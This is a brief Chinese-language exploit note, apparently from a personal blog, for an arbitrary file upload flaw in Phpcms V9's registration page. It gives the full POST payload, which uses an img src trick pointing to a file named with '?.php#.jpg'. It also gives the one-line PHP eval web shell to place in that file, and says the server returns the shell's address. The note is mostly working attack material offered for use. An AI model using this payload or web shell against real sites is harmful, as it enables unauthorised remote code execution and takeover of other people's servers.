Phpcms_V9任意文件上传
Phpcms_V9任意文件上传
下载最新版Phpcms,在注册页面进行post提交。
EXP:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=
2.txt中写入一句话:
<?php @eval($_POST[cmd]);?>
报错,并返回shell地址。
getshell。
精韧不怠,日进有功
